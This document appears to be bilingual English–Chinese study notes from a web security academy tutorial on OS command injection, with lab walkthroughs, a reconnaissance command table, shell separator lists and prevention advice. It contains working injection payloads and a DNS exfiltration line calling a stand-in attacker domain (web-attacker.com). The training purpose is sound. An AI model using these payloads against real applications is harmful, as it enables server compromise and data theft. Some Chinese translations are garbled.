4 OS command injection操作系统命令注入

4 OS command injection操作系统命令注入

In this section, we’ll explain what OS command injection is, describe how vulnerabilities can be detected and exploited, spell out some useful commands and techniques for different operating systems, and summarize how to prevent OS command injection.

一、What is OS command injection?

1. OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. 它允许攻击者在运行应用程序的服务器上执行任意操作系统命令，通常会完全破坏应用程序及其所有数据。
2. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization. 通常，攻击者可以利用OS命令注入漏洞来危害宿主基础设施的其他部分，利用信任关系将攻击转移到组织内的其他系统。

二、Executing arbitrary commands

1. Consider a shopping application that lets the user view whether an item is in stock in a particular store. This information is accessed via a URL like:考虑一个购物应用程序，该应用程序允许用户查看某一商品在特定商店中是否有库存。此信息通过类似于https://insecure-website.com/stockStatus?productID=381&storeID=29

2. To provide the stock information, the application must query various legacy systems. For historical reasons, the functionality is implemented by calling out to a shell command with the product and store IDs as arguments:要提供库存信息，应用程序必须查询各种遗留系统。由于历史原因，该功能是通过使用产品和存储id作为参数调用shell命令来实现的stockreport.pl 381 29

3. This command outputs the stock status for the specified item, which is returned to the user.该命令输出指定商品的库存状态，并将其返回给用户。

4. Since the application implements no defenses against OS command injection, an attacker can submit the following input to execute an arbitrary command:由于应用程序没有实现对OS命令注入的防御，攻击者可以提交以下输入来执行任意命令& echo aiwefwlguh &

5. If this input is submitted in the productID parameter, then the command executed by the application is: stockreport.pl & echo aiwefwlguh & 29

6. The echo command simply causes the supplied string to be echoed in the output, and is a useful way to test for some types of OS command injection. The & character is a shell command separator, and so what gets executed is actually three separate commands one after another. As a result, the output returned to the user is:echo命令只是在输出中回显所提供的字符串，是测试某些类型的OS命令注入的有用方法。字符&是shell命令分隔符，因此执行的实际上是三个依次独立的命令。因此，返回给用户的输出是 Error - productID was not provided aiwefwlguh 29: command not found

7. The three lines of output demonstrate that:

• The original stockreport.pl command was executed without its expected arguments, and so returned an error message.原始的stockreport.pl命令在没有预期参数的情况下执行，因此返回了错误消息。
• The injected echo command was executed, and the supplied string was echoed in the output.执行注入的echo命令，并且在输出中回显提供的字符串。
• The original argument 29 was executed as a command, which caused an error.原始参数29作为命令执行，从而导致错误。

Placing the additional command separator & after the injected command is generally useful because it separates the injected command from whatever follows the injection point. This reduces the likelihood that what follows will prevent the injected command from executing.

通常，将附加命令分隔符＆放置在注入命令之后是很有用的，因为这会将注入命令与注入点后面的内容分开。 这减少了随后发生的事情将阻止注入的命令执行的可能性。

Lab: OS command injection, simple case

This lab contains an OS command injection vulnerability in the product stock checker.

The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response.

To solve the lab, execute the whoami command to determine the name of the current user. 应用程序执行一个包含用户提供的产品和存储id的shell命令，并在其响应中返回该命令的原始输出。要解决实验室问题，请执行whoami命令来确定当前用户的名称。

1. Use Burp Suite to intercept and modify a request that checks the stock level.
2. Modify the storeID parameter, giving it the value 1|whoami.
3. Observe that the response contains the name of the current user.

三、 Useful commands

When you have identified an OS command injection vulnerability, it is generally useful to execute some initial commands to obtain information about the system that you have compromised. Below is a summary of some commands that are useful on Linux and Windows platforms:

|

Purpose of command	Linux	Windows
Name of current user	whoami	whoami
Operating system	uname -a	ver
Network configuration	ifconfig	ipconfig /all
Network connections	netstat -an	netstat -an
Running processes	ps -ef	tasklist

四、盲目操作系统命令注入漏洞Blind OS command injection vulnerabilities

1. Many instances of OS command injection are blind vulnerabilities. This means that the application does not return the output from the command within its HTTP response. Blind vulnerabilities can still be exploited, but different techniques are required.统命令注入的许多实例都是盲目漏洞。这意味着应用程序不会在其HTTP响应中返回命令的输出。盲目漏洞仍然可以被利用，但需要不同的技术。

2. Consider a web site that lets users submit feedback about the site. The user enters their email address and feedback message. The server-side application then generates an email to a site administrator containing the feedback. To do this, it calls out to the mail program with the submitted details. For example:操作系考虑一个让用户提交关于该网站的反馈的网站。用户输入他们的电子邮件地址和反馈信息。然后，服务器端应用程序向站点管理员生成一封包含反馈的电子邮件。为此，它调用带有提交的详细信息的邮件程序。例mail -s "This site is great" -aFrom:peter@normal-user.net feedback@vulnerable-website.com

3. The output from the mail command (if any) is not returned in the application’s responses, and so using the echo payload would not be effective. In this situation, you can use a variety of other techniques to detect and exploit a vulnerability.邮件命令的输出(如果有的话)没有在应用程序的响应中返回，因此使用echo有效负载是无效的。在这种情况下，您可以使用各种其他技术来检测和利用漏洞。

1. 使用时间延迟检测盲目的操作系统命令注入Detecting blind OS command injection using time delays

1. You can use an injected command that will trigger a time delay, allowing you to confirm that the command was executed based on the time that the application takes to respond. The ping command is an effective way to do this, as it lets you specify the number of ICMP packets to send, and therefore the time taken for the command to run:因为它允许您指定要发送的ICMP包的数量，从而指定运行该命令所需的时间& ping -c 10 127.0.0.1 &
   This command will cause the application to ping its loopback network adapter for 10 seconds. 这个命令将使应用程序ping它的环回网络适配器10秒。

Lab: Blind OS command injection with time delays

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.该应用程序执行包含用户提供的详细信息的shell命令。 命令的输出未在响应中返回。

To solve the lab, exploit the blind OS command injection vulnerability to cause a 10 second delay.

1. Use Burp Suite to intercept and modify the request that submits feedback.
2. Modify the email parameter, changing it to: email=x||ping+-c+10+127.0.0.1||
3. Observe that the response takes 10 seconds to return.

2. 通过重定向输出，利用盲操作系统命令注入Exploiting blind OS command injection by redirecting output

1. You can redirect the output from the injected command into a file within the web root that you can then retrieve using your browser. For example, if the application serves static resources from the filesystem location /var/www/static, then you can submit the following input:您可以将注入命令的输出重定向到Web根目录下的文件中，然后可以使用浏览器进行检索。 例如，如果应用程序从文件系统位置/ var / www / static提供静态资源，则可以提交以下输入：& whoami > /var/www/static/whoami.txt &

The > character sends the output from the whoami command to the specified file. You can then use your browser to fetch https://vulnerable-website.com/whoami.txt to retrieve the file, and view the output from the injected command.

Lab: Blind OS command injection with output redirection

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:应用程序执行一个包含用户提供的详细信息的shell命令。该命令的输出不会在响应中返回。但是，您可以使用输出重定向来捕获命令的输出。有一个可写文件夹在 /var/www/images/

The application serves the images for the product catalog from this location. You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file.应用程序提供来自此位置的产品目录的图像。您可以将注入命令的输出重定向到此文件夹中的一个文件，然后使用图像加载URL检索该文件的内容。要解决实验室问题，请执行whoami命令并检索输出。

To solve the lab, execute the whoami command and retrieve the output.

1. Use Burp Suite to intercept and modify the request that submits feedback.
2. Modify the email parameter, changing it to: email=||whoami>/var/www/images/output.txt||
3. Now use Burp Suite to intercept and modify the request that loads an image of a product.
4. Modify the filename parameter, changing the value to the name of the file you specified for the output of the injected command: filename=output.txt
5. Observe that the response contains the output from the injected command.

3. 利用带外(OAST)技术的盲操作系统命令注入Exploiting blind OS command injection using out-of-band (OAST) techniques

You can use an injected command that will trigger an out-of-band network interaction with a system that you control, using OAST techniques. For example:& nslookup kgji2ohoyw.web-attacker.com &

This payload uses the nslookup command to cause a DNS lookup for the specified domain. The attacker can monitor for the specified lookup occurring, and thereby detect that the command was successfully injected. 该负载使用nslookup命令对指定的域进行DNS查找。攻击者可以监视指定查找的发生情况，从而检测命令是否被成功注入。

Lab: Blind OS command injection with out-of-band interaction

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously异步方式 and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.但是，您可以触发与外部域的带外交互。

To solve the lab, exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator. 利用盲操作系统命令注入漏洞向Burp协作器发出DNS查找。

To prevent the Academy platform being used to attack third parties,
our firewall blocks interactions between the labs and arbitrary
external systems. To solve the lab, you must use Burp Collaborator’s
default public server (burpcollaborator.net).
为防止Academy平台用于攻击第三方，我们的防火墙阻止了实验室与任意外部系统之间的交互。 要解决此问题，您必须使用Burp
Collaborator的默认公共服务器（burpcollaborator.net）。

1. Use Burp Suite to intercept and modify the request that submits feedback.
2. Modify the email parameter, changing it to: email=x||nslookup+x.burpcollaborator.net||
   
   
   
   
   forward + 关闭拦截 ==解决
   
   The out-of-band channel also provides an easy way to exfiltrate漏出 the output from injected commands:

& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

This will cause a DNS lookup to the attacker’s domain containing the result of the whoami command:这将导致对攻击者包含whoami命令结果的域进行DNS查找
wwwuser.kgji2ohoyw.web-attacker.com

Lab: Blind OS command injection with out-of-band data exfiltration

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on
the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name
of the current user to complete the lab.

1. Use Burp Suite Professional to intercept and modify the request that submits feedback.
2. Go to the Burp menu, and launch the Burp Collaborator client.
3. Click “Copy to clipboard” to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.
4. Modify the email parameter, changing it to something like the following, but insert your Burp Collaborator subdomain where indicated: email=||nslookup+`whoami`.YOUR-SUBDOMAIN-HERE.burpcollaborator.net||
5. Go back to the Burp Collaborator client window, and click "Poll now". You should see some DNS interactions that were initiated by the application as the result of your payload. If you don’t see any interactions listed, wait a few seconds and try again, since the server-side command is executed asynchronously.异步
6. Observe that the output from your command appears in the subdomain子域 of the interaction, and you can view this within the Burp Collaborator client. The full domain name that was looked up is shown in the Description tab for the interaction.
7. To complete the lab, enter the name of the current user.

注意字体

五、注入操作系统命令的方法

 Ways of injecting OS commands

A variety of shell metacharacters 正则表达式元字符集can be used to perform OS command injection attacks.

A number of characters function as command separators, allowing commands to be chained together. The following command separators work on both Windows and Unix-based systems:一些字符作为命令分隔符，允许将命令链接在一起。下面的命令分隔符适用于Windows和基于unix的系统

&
&&
|
||

The following command separators work only on Unix-based systems:

;
Newline (0x0a or \n)

On Unix-based systems, you can also use backticks引号；反引号 or the dollar character to perform inline execution of an injected command within the original command:或者美元字符，用于在原始命令中执行注入命令的内联执行

` injected command `
$( injected command )

Note that the different shell metacharacters have subtly巧妙地 different behaviors that might affect whether they work in certain situations, and whether they allow in-band retrieval of command output or are useful only for blind exploitation.这些行为可能会影响它们是否在某些情况下起作用，以及它们是否允许带内检索命令输出或仅对盲目使用有用。

Sometimes, the input that you control appears within quotation marks in the original command. In this situation, you need to terminate the quoted context (using " or ') before using suitable shell metacharacters to inject a new command.有时，您控制的输入出现在原始命令的引号内。在这种情况下，在使用合适的shell元字符注入新命令之前，需要终止带引号的上下文(使用“或”

六、 How to prevent OS command injection attacks

1. By far the most effective way to prevent OS command injection vulnerabilities is to never call out to OS commands from application-layer code. 永远不要从应用层代码调用操作系统命令。

2. In virtually every case, there are alternate ways of implementing the required functionality using safer platform APIs.在几乎所有情况下，都有使用更安全的平台api实现所需功能的替代方法。

3. If it is considered unavoidable to call out to OS commands with user-supplied input, then strong input validation must be performed. Some examples of effective validation include:如果使用用户提供的输入调用OS命令被认为是不可避免的，那么必须执行强输入验证。一些有效验证的例子包括

• Validating against a whitelist of permitted values.根据允许值的白名单进行验证。
• Validating that the input is a number.验证输入是否为数字。
• Validating that the input contains only alphanumeric characters, no other syntax or whitespace.验证输入仅包含字母数字字符，不包含其他语法或空格。

Never attempt to sanitize input by escaping shell metacharacters. In practice, this is just too error-prone and vulnerable to being bypassed by a skilled attacker. 不要试图通过转义shell元字符来清除输入。在实践中，这太容易出错，很容易被熟练的攻击者绕过。